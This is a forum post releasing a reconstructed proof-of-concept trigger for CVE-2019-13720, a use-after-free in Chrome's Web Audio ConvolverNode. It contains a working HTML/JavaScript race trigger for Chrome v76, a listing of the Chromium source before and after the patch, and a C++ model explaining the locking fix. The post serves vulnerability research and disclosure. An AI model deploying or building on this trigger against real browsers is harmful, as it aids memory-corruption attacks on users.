CVE-2019-13720 Releases semi PoC code

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • CVE-2019-13720 Releases semi PoC code

    This PoC code is a reconstruction of the "CVE-2019-13720" trigger code after identifying a patch suspected of being modified because of "CVE-2019-13720" in the Google Chrome browser source code.
    Currently, the original PoC code of "CVE-2019-13720" has not been released.
    Therefore, this PoC, which simply reconstructed the vulnerability, was limited.
    The code works up to the "v76.0.3809.132" version, but unfortunately this PoC trigger does not work from "v77.0.3865.75".
    It's because of my lack of PoC code.
    You'll have to be satisfied until someone releases the correct "CVE-2019-13720" PoC code.


    P.S:
    There is a portable version of Chrome in the archive on this site, so if you want to test it, download it (v76.0.3809.132).
    The Wizard's Opium is "LSD".
    I'm afraid the police will misunderstand. I think this "LSD" is short for Linux Single Daemon. Hahaha.
    GNUSYS LAB Twitter: I created a Twitter account.
    https://twitter.com/GnusysL


    <Security News>

    https://www.boannews.com/media/view.asp?idx=84286
    https://www.tenable.com/blog/cve-201...ed-in-the-wild
    http://www.inews24.com/view/1219256
    https://www.cisecurity.org/advisory/...tion_2019-118/
    https://youyou-tech.com/2019/11/10/%...8%88%E8%A1%8C/
    https://securelist.com/chrome-0-day-...rdopium/94866/
    https://chromereleases.googleblog.co...&max-results=7
    https://chromereleases.googleblog.co...esktop_31.html
    https://securelist.com/chrome-0-day-...rdopium/94866/
    https://c.mi.com/thread-2581448-1-0.html
    https://twitter.com/cyberwar_15
    https://securelist.com/chrome-0-day-...346.1575584534
    https://www.edaily.co.kr/news/read?n...ediaCodeNo=257

    Code:
    <!DOCTYPE html>
    <html>
      <head>
        <meta charset="UTF-8">
        <meta name="viewport" content="width=device-width">
        <title>CVE-2019-13720: This "PoC" is released by "AmesianX(amesianx@gmail.com)" of "GNUSYS LAB" which belongs to the "POWERHACKER.NET" site.</title>
      </head>
      <body>
        <h1>CVE-2019-13720: Web Audio API ConvolverHandler's SetBuffer() UAF PoC for Google Chrome Browser Version v76.0.3809.132</h1>
        This PoC code is a reconstruction of the "CVE-2019-13720" trigger code after identifying a patch suspected of being modified because of "CVE-2019-13720" in the Google Chrome browser source code.<br>Currently, the original PoC code of "CVE-2019-13720" has not been released. Therefore, this PoC, which simply reconstructed the vulnerability, was limited.<br>The code works up to the "v76.0.3809.132" version, but unfortunately this PoC trigger does not work from "v77.0.3865.75".<br>It's because of my lack of PoC code. You'll have to be satisfied until someone releases the correct "CVE-2019-13720" PoC code.<br>
        <button onclick='CVE_2019_13720_PoC();'>Trigger the occult!</button>
        <pre></pre>
        <audio></audio>
        <script>
        function CVE_2019_13720_PoC()
        {
          var audioContext;
          var AudioBuffer;
          var convolver;
          var processor;
          var audio_buffer;
          var data;

          // The image load is only used as a start signal; the handler is attached in the same task
          // as the src assignment, so the load event cannot fire before it is installed.
          AllSeeingEyes.src = "https://powerhacker.net/exploit_research/allseeingeyes.jpg";
          AllSeeingEyes.onload = async () => {
            // 40 seconds of mono audio at 44.1 kHz, rendered offline so the graph runs without playback.
            audioContext = new OfflineAudioContext(1, 44100 * 40, 44100);
            processor = audioContext.createScriptProcessor(1024, 1, 1);
            processor.connect(audioContext.destination);
            AudioBuffer = audioContext.createBuffer(1, audioContext.sampleRate * 2.0, audioContext.sampleRate);
            // On every processing callback: re-install the impulse response, and queue a task on the
            // main thread that clears it again (convolver.buffer = null) while rendering continues.
            processor.onaudioprocess = async () => {
              console.log('[+][processor] onaudioprocess');
              setTimeout(function () { console.log('[+][Trigger] convolver.buffer = null'); convolver.buffer = null; }, 0);
              convolver.buffer = AudioBuffer;
            }
            convolver = audioContext.createConvolver();
            convolver.buffer = AudioBuffer;
            convolver.connect(audioContext.destination);
            audio_buffer = await audioContext.startRendering();
            data = new Uint8Array(audio_buffer.getChannelData(0).buffer);
            console.log('[+] data.length = ' + data.length);
            /*
            for (let i = 0; i < data.length; i += 4) {
              console.log('[+] audio_buffer[' + i + ']: 0x' + data[i].toString(16));
            }
            */
          }
        }
        </script>
        <img id="AllSeeingEyes">
      </body>
    </html>
    Code:
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/76.0.3809.132/third_party/blink/renderer/modules/webaudio/convolver_node.cc#93 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/77.0.3865.75/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/78.0.3904.87/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Not Patched)   |
    | https://chromium.googlesource.com/chromium/src.git/+/refs/tags/78.0.3904.97/third_party/blink/renderer/modules/webaudio/convolver_node.cc#100 (Google Patched)|
    +---------------------------------------------------------------------------------------------------------------------------------------------------------------+
    | https://codereview.qt.nokia.com/c/qt/qtwebengine-chromium/+/279969                                                                                            |
    | https://codereview.qt.nokia.com/c/qt/qtwebengine-chromium/+/279917/3/chromium/third_party/blink/renderer/modules/webaudio/convolver_node.cc#114               |
    +-------------------------------------------------------------------------------+-------------------------------------------------------------------------------+
    |     // new impulse response.                                                  |     // new impulse response.                                                  |
    |     output_bus->Zero();                                                       |     output_bus->Zero();                                                       |
    |   }                                                                           |   }                                                                           |
    | }                                                                             | }                                                                             |
    |                                                                               |                                                                               |
    | void ConvolverHandler::SetBuffer(AudioBuffer* buffer,                         | void ConvolverHandler::SetBuffer(AudioBuffer* buffer,                         |
    |                                  ExceptionState& exception_state) {           |                                  ExceptionState& exception_state) {           |
    |   DCHECK(IsMainThread());                                                     |   DCHECK(IsMainThread());                                                     |
    |                                                                               |                                                                               |
    |   if (!buffer) {                                                              |   if (!buffer) {                                                              |
    |     reverb_.reset();                                                          |     // BaseAudioContext::GraphAutoLocker context_locker(Context());           |
    |     shared_buffer_ = nullptr;                                                 |     // MutexLocker locker(process_lock_);                                     |
    |     return;                                                                   |     reverb_.reset();                                                          |
    |   }                                                                           |     shared_buffer_ = nullptr;                                                 |
    |                                                                               |     return;                                                                   |
    |   if (buffer->sampleRate() != Context()->sampleRate()) {                      |   }                                                                           |
    |     exception_state.ThrowDOMException(                                        |                                                                               |
    |         DOMExceptionCode::kNotSupportedError,                                 |   if (buffer->sampleRate() != Context()->sampleRate()) {                      |
    |         "The buffer sample rate of " + String::Number(buffer->sampleRate()) + |     exception_state.ThrowDOMException(                                        |
    |             " does not match the context rate of " +                          |         DOMExceptionCode::kNotSupportedError,                                 |
    |                                                                               |         "The buffer sample rate of " + String::Number(buffer->sampleRate()) + |
    |                                                                               |             " does not match the context rate of " +                          |
    +-------------------------------------------------------------------------------+-------------------------------------------------------------------------------+
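    The side-by-side listing above shows the shape of the fix: the `buffer == nullptr` branch of `SetBuffer()` must take `process_lock_` before it resets `reverb_`, because `Process()` on the audio thread only try-locks that mutex and otherwise outputs silence. The following is an added, simplified C++ model of that hand-off written for this page; it is not Blink code, and `ConvolverModel`, `Reverb`, `SequenceOk` and the `patched` flag are this model's own names.

```cpp
// Added model (not Blink code) of the ConvolverHandler SetBuffer()/Process()
// hand-off. The "patched" flag selects whether the null branch takes the lock.
#include <algorithm>
#include <cstddef>
#include <memory>
#include <mutex>
#include <vector>

struct Reverb { std::vector<float> impulse; };

class ConvolverModel {
 public:
  // Main thread: install or clear the impulse response. The unpatched null
  // branch resets reverb_ without holding process_lock_, so a concurrent
  // Process() can still be reading through it; the patched branch serializes.
  void SetBuffer(const std::vector<float>* buffer, bool patched) {
    if (!buffer) {
      std::unique_lock<std::mutex> lock(process_lock_, std::defer_lock);
      if (patched) lock.lock();  // the fix: wait for Process() to finish
      reverb_.reset();
      return;
    }
    std::lock_guard<std::mutex> lock(process_lock_);
    reverb_ = std::make_unique<Reverb>(Reverb{*buffer});
  }

  // Audio thread: try-lock only. If SetBuffer() holds the lock we are in the
  // middle of a replacement, so emit silence instead of touching reverb_.
  // Returns the number of impulse samples written (0 means silence).
  std::size_t Process(std::vector<float>& out) {
    std::unique_lock<std::mutex> lock(process_lock_, std::try_to_lock);
    if (!lock.owns_lock() || !reverb_) {
      std::fill(out.begin(), out.end(), 0.0f);
      return 0;
    }
    std::size_t n = std::min(out.size(), reverb_->impulse.size());
    for (std::size_t i = 0; i < n; ++i) out[i] = reverb_->impulse[i];
    return n;
  }

 private:
  std::mutex process_lock_;
  std::unique_ptr<Reverb> reverb_;
};

// Deterministic single-threaded walk through the states the PoC cycles
// between: no buffer, buffer installed, buffer cleared to null.
bool SequenceOk(bool patched) {
  ConvolverModel m;
  std::vector<float> out(4, 9.0f);
  const std::vector<float> ir{1.0f, 2.0f, 3.0f};  // constructed impulse
  if (m.Process(out) != 0) return false;          // nothing installed yet
  m.SetBuffer(&ir, patched);
  if (m.Process(out) != 3 || out[1] != 2.0f) return false;
  m.SetBuffer(nullptr, patched);                  // the path the PoC exercises
  return m.Process(out) == 0 && out[0] == 0.0f;   // silence, no dangling read
}
```

Only the locking in the null branch differs between the two modes; the race the PoC relies on is the window between `reverb_.reset()` and a concurrent `Process()` that the unpatched branch leaves open.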